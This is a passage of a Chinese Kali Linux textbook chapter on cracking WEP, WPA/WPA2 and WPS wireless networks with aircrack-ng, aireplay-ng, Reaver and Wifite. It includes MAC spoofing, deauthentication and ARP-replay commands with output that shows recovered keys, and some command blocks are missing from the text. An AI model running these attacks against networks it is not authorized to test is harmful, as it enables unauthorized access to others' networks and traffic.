Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具。该工具主要用了两种攻击方式进行WEP破解。一种是FMS攻击,该攻击方式是以发现该WEP漏洞的研究人员名字(Scott Fluhrer、Itsik Mantin及Adi Shamir)所命名;另一种是Korek攻击,该攻击方式是通过统计进行攻击的,并且该攻击的效率要远高于FMS攻击。本节将介绍使用Aircrack-ng破解无线网络。
9.2.1 破解WEP加密的无线网络
Wired Equivalent Privacy或WEP(有线等效加密)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络。不过密码分析学家已经找出WEP好几个弱点,因此在2003年被Wi-Fi Protected Access(WPA)淘汰,又在2004年由完整的IEEE 802.11i标准(又称为WPA2)所取代。本小节将介绍破解WEP加密的无线网络。
使用Aircrack破解使用WEP加密的无线网络。具体操作步骤如下所示。
(1)使用airmon-ng命令查看当前系统中的无线网络接口。执行命令如下所示:
输出的信息表示,当前系统中存在一个无线网络接口。从输出结果的Interface列,可以看到当前系统的无线接口为wlan0。
(2)修改wlan0接口的MAC地址。因为MAC地址标识主机所在的网络,修改主机的MAC地址可以隐藏真实的MAC地址。在修改MAC地址之前,需要停止该接口。执行命令如下所示:
或者:
root@kali<span>:~</span><span># ifconfig wlan0 down</span>
执行以上命令后,wlan0接口则停止。此时就可以修改MAC地址了,执行命令如下 所示:
<span>root</span>@<span>kali</span>:~# <span>macchanger</span> <span>--mac</span> <span>00</span><span>:11</span><span>:22</span><span>:33</span><span>:44</span><span>:55</span> <span>wlan0</span><span>Permanent</span> <span>MAC</span>: <span>00</span><span>:c1</span><span>:40</span><span>:76</span><span>:05</span><span>:6c</span> (unknown)<span>Current</span> <span>MAC</span>: <span>00</span><span>:c1</span><span>:40</span><span>:76</span><span>:05</span><span>:6c</span> (unknown)<span>New</span> <span>MAC</span>: <span>00</span><span>:11</span><span>:22</span><span>:33</span><span>:44</span><span>:55</span> (Cimsys Inc)
输出的信息显示了wlan0接口永久的MAC地址、当前的MAC地址及新的MAC地址。可以看到wlan1接口的MAC地址已经被修改。
(3)重新启动wlan0。执行命令如下所示:
输出的信息显示了无线网卡wlan0的芯片及驱动类型。例如,当前系统的无线网卡芯片为Ralink RT2870/3070;默认驱动为rt2800usb,并显示监听模式被启用,映射网络接口为mon0。
有时候使用airmon-ng start wlan0命令启用无线网卡时,可能会出现SIOCSIFFLAGS: Operation not possible due to RF-kill错误。这是因为Linux下有一个软件RF-kill,该软件为了省电会将不使用的无线设备(如WIFI和Buletooth)自动关闭。当用户使用这些设备时,RF-kill不会智能的自动打开,需要手动解锁。用户可以执行rfkill list命令查看所有设备,如下所示:
<span>root@kali:~#</span> <span>rfkill</span> <span>list</span><span>0: ideapad_wlan:</span> <span>Wireless</span> <span>LAN</span><span>Soft blocked:</span> <span>yes</span><span>Hard blocked:</span> <span>no</span><span>1: phy0:</span> <span>Wireless</span> <span>LAN</span><span>Soft blocked:</span> <span>yes</span><span>Hard blocked:</span> <span>no</span>
该列表中前面的编号,表示的是设备的索引号。用户可以通过指定索引号,停止或启用某个设备。如启用所有设备,执行如下所示的命令:
root@kali<span>:~</span><span># rfkill unblock all</span>
执行以上命令后,没有任何信息输出。以上命令表示,解除所有被关闭的设备。
(4)使用airodump命令定位附近所有可用的无线网络。执行命令如下所示:
以上输出的信息显示了附近所有可用的无线网络。当找到用户想要攻击的无线路由器时,按下Ctrl+C键停止搜索。
从输出的信息中看到有很多参数。详细介绍如下所示。
- BSSID:无线的IP地址。
- PWR:网卡报告的信号水平。
- Beacons:无线发出的通告编号。
- Data:被捕获到的数据分组的数量,包括广播分组。
- /s:过去10秒钟内每秒捕获数据分组的数量。
- CH:信道号(从Beacons中获取)。
- MB:无线所支持的最大速率。如果MB=11,它是802.11b;如果MB=22,它是802.11b+;如果更高就是802.11g。后面的点(高于54之后)表明支持短前导码。
- ENC:使用的加密算法体系。OPN表示无加密。WEP?表示WEP或者WPA/WPA2模式,WEP(没有问号)表示静态或动态WEP。如果出现TKIP或CCMP,那么就是WPA/WPA2。
- CIPHER:检测到的加密算法,是CCMP、WRAAP、TKIP、WEP和WEP104中的一个。典型的来说(不一定),TKIP与WPA结合使用,CCMP与WPA2结合使用。如果密钥索引值大于0,显示为WEP40。标准情况下,索引0-3是40bit,104bit应该是0。
- AUTH:使用的认证协议。常用的有MGT(WPA/WPA2使用独立的认证服务器,平时我们常说的802.1x、radius和eap等)、SKA(WEP的共享密钥)、PSK(WPA/WPA2的预共享密钥)或者OPN(WEP开放式)。
- ESSID:指所谓的SSID号。如果启用隐藏的SSID的话,它可以为空。这种情况下,airodump-ng试图从proberesponses和associationrequests中获取SSID。
- STATION:客户端的MAC地址,包括连上的和想要搜索无线来连接的客户端。如果客户端没有连接上,就在BSSID下显示“notassociated”。
- Rate:表示传输率。
- Lost:在过去10秒钟内丢失的数据分组,基于序列号检测。它意味着从客户端来的数据丢包,每个非管理帧中都有一个序列号字段,把刚接收到的那个帧中的序列号和前一个帧中的序列号一减就能知道丢了几个包。
- Frames:客户端发送的数据分组数量。
- Probe:被客户端查探的ESSID。如果客户端正试图连接一个无线,但是没有连接上,那么就显示在这里。
(5)使用airodump-ng捕获指定BSSID的文件。执行命令如下所示。
airodump-ng命令常用的选项如下所示。
- -c:指定选择的频道。
- -w:指定一个文件名,用于保存捕获的数据。
- -bssid:指定攻击的BSSID。
下面将Bssid为14:E6:E4:AC:FB:20的无线路由器作为攻击目标。执行命令如下所示:
从输出的信息中可以看到ESSID为Test无线路由器的#Data一直在变化,表示有客户端正与无线发生数据交换。以上命令执行成功后,会生成一个名为wirelessattack-01.ivs的文件,而不是wirelessattack.ivs。这是因为airodump-ng工具为了方便后面破解的时候调用,所有对保存文件按顺序编了号,于是就多了-01这样的序号,以此类推。在进行第二次攻击时,若使用同样文件名wirelessattack保存的话,就会生成名为wirelessattack-02.ivs文件。
(6)打开一个新的终端窗口,运行aireplay命令。aireplay命令的语法格式如下所示:
<span>aireplay-ng</span> <span>-1</span> 0 <span>-a</span> <span>[BSSID]</span> <span>-h</span> <span>[our Chosen MAC address]</span> <span>-e</span> <span>[ESSID]</span> <span>[Interface]</span><span>aireplay-ng</span> <span>-dauth</span> 1 <span>-a</span> <span>[BSSID]</span> <span>-c</span> <span>[our Chosen MAC address]</span> <span>[Interface]</span>
启动aireplay,执行命令如下所示:
<span>root@kali:~#</span> <span>aireplay-ng</span> <span>-1</span> <span>0</span> <span>-a</span> <span>14</span><span>:E6:E4:AC:FB:20</span> <span>-h</span> <span>00</span><span>:11:22:33:44:55</span> <span>-e</span> <span>Test</span> <span>mon0</span><span>The</span> <span>interface</span> <span>MAC</span> <span>(00:C1:40:76:05:6C)</span> <span>doesn\'t</span> <span>match</span> <span>the</span> <span>specified</span> <span>MAC</span> <span>(-h).</span> <span>ifconfig</span> <span>mon0</span> <span>hw</span> <span>ether</span> <span>00</span><span>:11:22:33:44:55</span><span>17</span><span>:25:17</span> <span>Waiting</span> <span>for</span> <span>beacon</span> <span>frame</span> <span>(BSSID:</span> <span>14</span><span>:E6:E4:AC:FB:20)</span> <span>on</span> <span>channel</span> <span>1</span><span>17</span><span>:25:17</span> <span>Sending</span> <span>Authentication</span> <span>Request</span> <span>(Open</span> <span>System)</span> <span>[ACK]</span><span>17</span><span>:25:17</span> <span>Switching</span> <span>to</span> <span>shared</span> <span>key</span> <span>authentication</span><span>17</span><span>:25:19</span> <span>Sending</span> <span>Authentication</span> <span>Request</span> <span>(Shared</span> <span>Key)</span> <span>[ACK]</span><span>17</span><span>:25:19</span> <span>Switching</span> <span>to</span> <span>shared</span> <span>key</span> <span>authentication</span><span>17</span><span>:25:21</span> <span>Sending</span> <span>Authentication</span> <span>Request</span> <span>(Shared</span> <span>Key)</span> <span>[ACK]</span><span>17</span><span>:25:21</span> <span>Switching</span> <span>to</span> <span>shared</span> <span>key</span> <span>authentication</span><span>17</span><span>:25:23</span> <span>Sending</span> <span>Authentication</span> <span>Request</span> <span>(Shared</span> <span>Key)</span> <span>[ACK]</span><span>17</span><span>:25:23</span> <span>Switching</span> <span>to</span> <span>shared</span> <span>key</span> <span>authentication</span><span>17</span><span>:25:25</span> <span>Sending</span> <span>Authentication</span> <span>Request</span> <span>(Shared</span> <span>Key)</span> <span>[ACK]</span><span>17</span><span>:25:25</span> <span>Switching</span> <span>to</span> <span>shared</span> <span>key</span> <span>authentication</span><span>17</span><span>:25:27</span> <span>Sending</span> <span>Authentication</span> <span>Request</span> <span>(Shared</span> <span>Key)</span> <span>[ACK]</span><span>17</span><span>:25:27</span> <span>Switching</span> <span>to</span> <span>shared</span> <span>key</span> <span>authentication</span><span>17</span><span>:25:29</span> <span>Sending</span> <span>Authentication</span> <span>Request</span> <span>(Shared</span> <span>Key)</span> <span>[ACK]</span><span>17</span><span>:25:29</span> <span>Switching</span> <span>to</span> <span>shared</span> <span>key</span> <span>authentication</span>
(7)使用aireplay发送一些流量给无线路由器,以至于能够捕获到数据。语法格式如下所示:
<span>aireplay-ng</span> 3 <span>-b</span> <span>[BSSID]</span> <span>-h</span> <span>[Our chosen MAC address]</span> <span>[Interface]</span>
执行命令如下所示:
<span>root@kali:~#</span> <span>aireplay-ng</span> <span>-3</span> <span>-b</span> <span>14</span><span>:E6:E4:AC:FB:20</span> <span>-h</span> <span>00</span><span>:11:22:33:44:55</span> <span>mon0</span><span>The</span> <span>interface</span> <span>MAC</span> <span>(00:C1:40:76:05:6C)</span> <span>doesn\'t</span> <span>match</span> <span>the</span> <span>specified</span> <span>MAC</span> <span>(-h).</span> <span>ifconfig</span> <span>mon0</span> <span>hw</span> <span>ether</span> <span>00</span><span>:11:22:33:44:55</span><span>17</span><span>:26:54</span> <span>Waiting</span> <span>for</span> <span>beacon</span> <span>frame</span> <span>(BSSID:</span> <span>14</span><span>:E6:E4:AC:FB:20)</span> <span>on</span> <span>channel</span> <span>1</span><span>Saving</span> <span>ARP</span> <span>requests</span> <span>in</span> <span>replay_arp-0515-172654.cap</span><span>You</span> <span>should</span> <span>also</span> <span>start</span> <span>airodump-ng</span> <span>to</span> <span>capture</span> <span>replies.</span><span>Notice:</span> <span>got</span> <span>a</span> <span>deauth/disassoc</span> <span>packet.</span> <span>Is</span> <span>the</span> <span>source</span> <span>MAC</span> <span>associated</span> <span>?</span><span>Read</span> <span>1259</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>189</span> <span>ACKs),</span> <span>sent</span> <span>198</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>1547</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>235</span> <span>ACKs),</span> <span>sent</span> <span>248</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>1843</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>285</span> <span>ACKs),</span> <span>sent</span> <span>298</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>2150</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>333</span> <span>ACKs),</span> <span>sent</span> <span>348</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>2446</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>381</span> <span>ACKs),</span> <span>sent</span> <span>398</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>2753</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>430</span> <span>ACKs),</span> <span>sent</span> <span>449</span> <span>packets…(500</span> <span>pps</span><span>Read</span> <span>3058</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>476</span> <span>ACKs),</span> <span>sent</span> <span>499</span> <span>packets…(500</span> <span>pps</span><span>Read</span> <span>3367</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>525</span> <span>ACKs),</span> <span>sent</span> <span>548</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>3687</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>576</span> <span>ACKs),</span> <span>sent</span> <span>598</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>4001</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>626</span> <span>ACKs),</span> <span>sent</span> <span>649</span> <span>packets…(500</span> <span>pps</span><span>Read</span> <span>4312</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>674</span> <span>ACKs),</span> <span>sent</span> <span>699</span> <span>packets…(500</span> <span>pps</span><span>Read</span> <span>4622</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>719</span> <span>ACKs),</span> <span>sent</span> <span>749</span> <span>packets…(500</span> <span>pps</span><span>Read</span> <span>4929</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>768</span> <span>ACKs),</span> <span>sent</span> <span>798</span> <span>packets…(499</span> <span>pps</span><span>Read</span> <span>5239</span> <span>packets</span> <span>(got</span> <span>1</span> <span>ARP</span> <span>requests</span> <span>and</span> <span>817</span> <span>ACKs),</span> <span>sent</span> <span>848</span> <span>packets…(499</span> <span>pps</span>
输出的信息就是使用ARP Requests的方式来读取ARP请求报文的过程,此时回到airodump-ng界面查看,可以看到Test的Frames栏的数字在飞速的递增。在抓取的无线数据报文达到了一定数量后,一般都是指IVsX值达到2万以上时,就可以开始破解,若不能成功就等待数据包文继续抓取,然后多尝试几次。
(8)使用Aircrack破解密码。执行命令如下所示:
从输出的结果中可以看到KEY FOUND,表示密码已经找到,为abcde。
9.2.2 破解WPA/WPA2无线网络
WPA全名为Wi-Fi Protected Access,有WPA和WPA2两个标准。它是一种保护无线电脑网络安全的协议。对于启用WPA/WPA2加密的无线网络,其攻击和破解步骤及攻击是完全一样的。不同的是,在使用airodump-ng进行无线探测的界面上,会提示为WPA CCMP PSK。当使用aireplay-ng进行攻击后,同样获取到WPA握手数据包及提示;在破解时需要提供一个密码字典。下面将介绍破解WPA/WPA2无线网络的方法。
使用aircrack-ng破解WPA/WPA2无线网络的具体操作步骤如下所示。
(1)查看无线网络接口。执行命令如下所示:
(2)停止无线网络接口。执行命令如下所示:
(3)修改无线网卡MAC地址。执行命令如下所示:
<span>root</span>@<span>kali</span>:~# <span>macchanger</span> <span>--mac</span> <span>00</span><span>:11</span><span>:22</span><span>:33</span><span>:44</span><span>:55</span> <span>wlan0</span><span>Permanent</span> <span>MAC</span>: <span>00</span><span>:c1</span><span>:40</span><span>:76</span><span>:05</span><span>:6c</span> (unknown)<span>Current</span> <span>MAC</span>: <span>00</span><span>:c1</span><span>:40</span><span>:76</span><span>:05</span><span>:6c</span> (unknown)<span>New</span> <span>MAC</span>: <span>00</span><span>:11</span><span>:22</span><span>:33</span><span>:44</span><span>:55</span> (Cimsys Inc)
(4)启用无线网络接口。执行命令如下所示:
(5)捕获数据包。执行命令如下所示:
(6)对无线路由器Test进行Deauth攻击。执行命令如下所示:
<span>root</span>@<span>kali</span>:~# <span>aireplay-ng</span> <span>--deauth</span> <span>1</span> <span>-a</span> <span>14</span><span>:E6</span><span>:E4</span><span>:AC</span><span>:FB</span><span>:20</span> <span>-c</span> <span>00</span><span>:11</span><span>:22</span><span>:33</span>: <span>44</span><span>:55</span> <span>mon0</span><span>17</span><span>:50</span><span>:27</span> <span>Waiting</span> <span>for</span> <span>beacon</span> <span>frame</span> (<span>BSSID</span>: <span>14</span>:<span>E6</span>:<span>E4</span>:<span>AC</span>:<span>FB</span>:<span>20</span>) <span>on</span> <span>channel</span> <span>1</span><span>17</span><span>:50</span><span>:30</span> <span>Sending</span> <span>64</span> <span>directed</span> <span>DeAuth</span>. <span>STMAC</span>: <span>[00:11:22:33:44:55]</span> <span>[12|59 ACKs]</span>
(7)破解密码。执行命令如下所示:
从输出的信息中可以看到无线路由器的密码已经成功破解。在KEY FOUND提示的右侧可以看到密码已被破解出,为daxueba,破解速度约为500.88 k/s。
9.2.3 攻击WPS(Wi-Fi Proteced Setup)
WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定标准。该标准主要是为了解决无线网络加密认证设定的步骤过于繁杂的弊病。因为通常用户往往会因为设置步骤太麻烦,以至于不做任何加密安全设定,从而引起许多安全上的问题。所以很多人使用WPS设置无线设备,可以通过个人识别码(PIN)或按钮(PBC)取代输入一个很长的密码短语。当开启该功能后,攻击者就可以使用暴力攻击的方法来攻击WPS。本小节将介绍使用各种工具攻击WPS。
现在大部分路由器上都支持WPS功能。以前路由器有专门的WPS设置,现在的路由器使用QSS功能取代了。这里以TP-LINK型号为例,介绍设置WPS功能,如图9.15所示。如果使用WPS的PBC方式,只需要按下路由器上的QSS/RESET按钮就可以了。
图9.15 设置WPS
从该界面可以看到QSS功能已开启,可以看到当前的PIN码是04588306。这里可以重新生成新的PIN码,或者恢复初始PIN码。
【实例9-1】使用Reaver破解WPS。具体操作步骤如下所示。
(1)插入无线网卡,使用ifconfig命令查看无线网卡是否已经正确插入。执行命令如下所示:
<span>root</span>@<span>Kali</span>:~# <span>ifconfig</span><span>eth0</span> <span>Link</span> <span>encap</span><span>:Ethernet</span> <span>HWaddr</span> <span>00</span><span>:19</span><span>:21</span><span>:3f</span><span>:c3</span><span>:e5</span> <span>inet</span> <span>addr</span><span>:192.168.5.4</span> <span>Bcast</span><span>:192.168.5.255</span> <span>Mask</span><span>:255.255.255.0</span> <span>inet6</span> <span>addr</span>: <span>fe80</span><span>::219</span><span>:21ff</span><span>:fe3f</span><span>:c3e5</span>/<span>64</span> <span>Scope</span><span>:Link</span> <span>UP</span> <span>BROADCAST</span> <span>RUNNING</span> <span>MULTICAST</span> <span>MTU</span><span>:1500</span> <span>Metric</span><span>:1</span> <span>RX</span> <span>packets</span><span>:10541</span> <span>errors</span><span>:0</span> <span>dropped</span><span>:0</span> <span>overruns</span><span>:0</span> <span>frame</span><span>:0</span> <span>TX</span> <span>packets</span><span>:7160</span> <span>errors</span><span>:0</span> <span>dropped</span><span>:0</span> <span>overruns</span><span>:0</span> <span>carrier</span><span>:0</span> <span>collisions</span><span>:0</span> <span>txqueuelen</span><span>:1000</span> <span>RX</span> <span>bytes</span><span>:4205470</span> (<span>4.0</span> MiB) <span>TX</span> <span>bytes</span><span>:600691</span> (<span>586.6</span> KiB)<span>lo</span> <span>Link</span> <span>encap</span><span>:Local</span> <span>Loopback</span> <span>inet</span> <span>addr</span><span>:127.0.0.1</span> <span>Mask</span><span>:255.0.0.0</span> <span>inet6</span> <span>addr</span>: <span>::1</span>/<span>128</span> <span>Scope</span><span>:Host</span> <span>UP</span> <span>LOOPBACK</span> <span>RUNNING</span> <span>MTU</span><span>:65536</span> <span>Metric</span><span>:1</span> <span>RX</span> <span>packets</span><span>:296</span> <span>errors</span><span>:0</span> <span>dropped</span><span>:0</span> <span>overruns</span><span>:0</span> <span>frame</span><span>:0</span> <span>TX</span> <span>packets</span><span>:296</span> <span>errors</span><span>:0</span> <span>dropped</span><span>:0</span> <span>overruns</span><span>:0</span> <span>carrier</span><span>:0</span> <span>collisions</span><span>:0</span> <span>txqueuelen</span><span>:0</span> <span>RX</span> <span>bytes</span><span>:17760</span> (<span>17.3</span> KiB) <span>TX</span> <span>bytes</span><span>:17760</span> (<span>17.3</span> KiB)
从输出的信息中可以看到,只有一个以太网接口eth0。这是因为无线网卡可能没有启动,首先来启动该无线网卡。执行命令如下所示:
root@Kali<span>:~</span><span># ifconfig wlan0 up</span>
执行以上命令后,没有任何信息输出。此时再次执行ifconfig命令,查看无线网络是否已启动,如下所示:
<span>root</span>@<span>Kali</span>:~# <span>ifconfig</span>......<span>wlan0</span> <span>Link</span> <span>encap</span><span>:Ethernet</span> <span>HWaddr</span> <span>08</span><span>:10</span><span>:76</span><span>:49</span><span>:c3</span><span>:cd</span> <span>UP</span> <span>BROADCAST</span> <span>MULTICAST</span> <span>MTU</span><span>:1500</span> <span>Metric</span><span>:1</span> <span>RX</span> <span>packets</span><span>:0</span> <span>errors</span><span>:0</span> <span>dropped</span><span>:0</span> <span>overruns</span><span>:0</span> <span>frame</span><span>:0</span> <span>TX</span> <span>packets</span><span>:0</span> <span>errors</span><span>:0</span> <span>dropped</span><span>:0</span> <span>overruns</span><span>:0</span> <span>carrier</span><span>:0</span> <span>collisions</span><span>:0</span> <span>txqueuelen</span><span>:1000</span> <span>RX</span> <span>bytes</span><span>:0</span> (<span>0.0</span> B) <span>TX</span> <span>bytes</span><span>:0</span> (<span>0.0</span> B)
看到以上输出信息,则表示无线网卡已成功启动,其网络接口为wlan0。
(2)启动无线网卡为监听模式。执行命令如下所示:
从输出的信息中,可以看到monitor mode enabled on mon0,表示无线网卡已启动监听模式。在以上信息中,还可以看到无线网卡的芯片级驱动类型。其中,该网卡的芯片为Ralink,默认驱动为rt2800usb。
注意:执行以上命令启动监听模式,一定要确定正确识别无线网卡的芯片和驱动。否则,该无线网卡可能导致攻击失败。
(3)攻击WPS。执行命令如下所示:
<span>root@kali:~#</span> <span>reaver</span> <span>-i</span> <span>mon0</span> <span>-b</span> <span>14</span><span>:E6:E4:AC:FB:20</span> <span>-vv</span><span>Reaver</span> <span>v1.4</span> <span>WiFi</span> <span>Protected</span> <span>Setup</span> <span>Attack</span> <span>Tool</span><span>Copyright</span> <span>(c)</span> <span>2011</span><span>,</span> <span>Tactical</span> <span>Network</span> <span>Solutions,</span> <span>Craig</span> <span>Heffner</span> <span><cheffner@</span> <span>tacnetsol.com></span><span>[+]</span> <span>Waiting</span> <span>for</span> <span>beacon</span> <span>from</span> <span>14</span><span>:E6:E4:AC:FB:20</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>1</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>2</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>3</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>11</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>4</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>5</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>6</span><span>[+]</span> <span>Switching</span> <span>mon0</span> <span>to</span> <span>channel</span> <span>7</span><span>[+]</span> <span>Associated</span> <span>with</span> <span>8C:21:0A:44:09:F8</span> <span>(ESSID:</span> <span>yztxty)</span><span>[+]</span> <span>Trying</span> <span>pin</span> <span>12345670</span><span>[+]</span> <span>Sending</span> <span>EAPOL</span> <span>START</span> <span>request</span><span>[+]</span> <span>Received</span> <span>identity</span> <span>request</span><span>[+]</span> <span>Sending</span> <span>identity</span> <span>response</span><span>[+]</span> <span>Received</span> <span>identity</span> <span>request</span><span>[+]</span> <span>Sending</span> <span>identity</span> <span>response</span><span>[+]</span> <span>Received</span> <span>M1</span> <span>message</span><span>[+]</span> <span>Sending</span> <span>M2</span> <span>message</span><span>[+]</span> <span>Received</span> <span>M3</span> <span>message</span><span>[+]</span> <span>Sending</span> <span>M4</span> <span>message</span><span>[+]</span> <span>Received</span> <span>WSC</span> <span>NACK</span><span>[+]</span> <span>Sending</span> <span>WSC</span> <span>NACK</span><span>......</span>
从以上输出信息中,可以看到正在等待连接到14:E6:E4:AC:FB:20无线路由器的信号。并且通过发送PIN信息,获取密码。
如果没有路由器没有开启WPS的话,将会出现如下所示的信息:
<span>[!]</span> <span>WARNING</span>: <span>Failed</span> <span>to</span> <span>associate</span> <span>with</span> <span>14</span><span>:E6</span><span>:E4</span><span>:AC</span><span>:FB</span><span>:20</span> (<span>ESSID</span>: XXXX)
Fern WiFi Cracker是一个非常不错的工具,用来测试无线网络安全。后面将会介绍使用该工具,攻击Wi-Fi网络。这里首先介绍使用Fern WiFi Cracker工具来攻击WPS。
【实例9-2】使用Wifite攻击WPS。具体操作步骤如下所示。
(1)启动Wifite工具,并指定使用common.txt密码字典。在命令行终端执行如下所示的命令:
root@kali<span>:~</span><span># wifite -dict common.txt</span>
执行以上命令后,将显示如下所示的信息:
以上信息显示了WiFite工具的版本信息,支持平台,并且开始扫描无线网络。当扫描到想要破解的无线网络时,按下CTRL+C组合键停止扫描。
(2)停止扫描无线网络,将显示如下所示的信息:
从以上输出信息中,可以看到扫描到五个无线接入点和三个客户端。在输出信息中,共显示了7列。分别表示无线接入点编号、ESSID号、信道、加密方式、电功率、是否开启wps和客户端。如果仅有一个客户端连接到无线接入点,则CLIENT列显示是client。如果有多个客户端连接的话,则显示是clients。
(3)此时,选择要攻击的无线接入点。这里选择第五个无线接入点,输入“1”。然后按下回车键将开始攻击,显示信息如下所示:
[+] <span>select</span> target numbers (<span>1</span><span>-5</span>) separated <span>by</span> commas, <span>or</span> <span>\'all\'</span>: <span>1</span>[+] <span>1</span> target selected.[<span>0</span>:<span>00</span>:<span>00</span>] initializing WPS PIN attack <span>on</span> yzty (EC:<span>17</span>:<span>2</span>F:<span>46</span>:<span>70</span>:BA) [<span>0</span>:<span>11</span>:<span>00</span>] WPS attack, <span>0</span>/<span>0</span> <span>success</span>/ttl, [!] unable <span>to</span> <span>complete</span> successful try <span>in</span> <span>660</span> <span>seconds</span> [+] skipping yzty [<span>0</span>:<span>08</span>:<span>20</span>] <span>starting</span> wpa handshake capture <span>on</span> <span>\"yzty\"</span> [<span>0</span>:<span>08</span>:<span>11</span>] <span>new</span> <span>client</span> <span>found</span>: <span>18</span>:DC:<span>56</span>:F0:<span>62</span>:AF [<span>0</span>:<span>08</span>:<span>09</span>] listening <span>for</span> handshake… [<span>0</span>:<span>00</span>:<span>11</span>] handshake captured! saved <span>as</span> <span>\"hs/yzty_EC-17-2F-46-70-BA.cap\"</span> [+] <span>2</span> attacks completed: [+] <span>1</span>/<span>2</span> WPA attacks succeeded yzty (EC:<span>17</span>:<span>2</span>F:<span>46</span>:<span>70</span>:BA) handshake captured saved <span>as</span> hs/yzty_EC<span>-17</span><span>-2</span>F<span>-46</span><span>-70</span>-BA.cap [+] <span>starting</span> WPA cracker <span>on</span> <span>1</span> handshake [<span>0</span>:<span>00</span>:<span>00</span>] cracking yzty <span>with</span> aircrack-ng [+] cracked yzty (EC:<span>17</span>:<span>2</span>F:<span>46</span>:<span>70</span>:BA)! [+] <span>key</span>: <span>\"huolong5\"</span>[+] quitting
从输出的信息中,可以看到破解出yzty无线设备的密码为huolong5。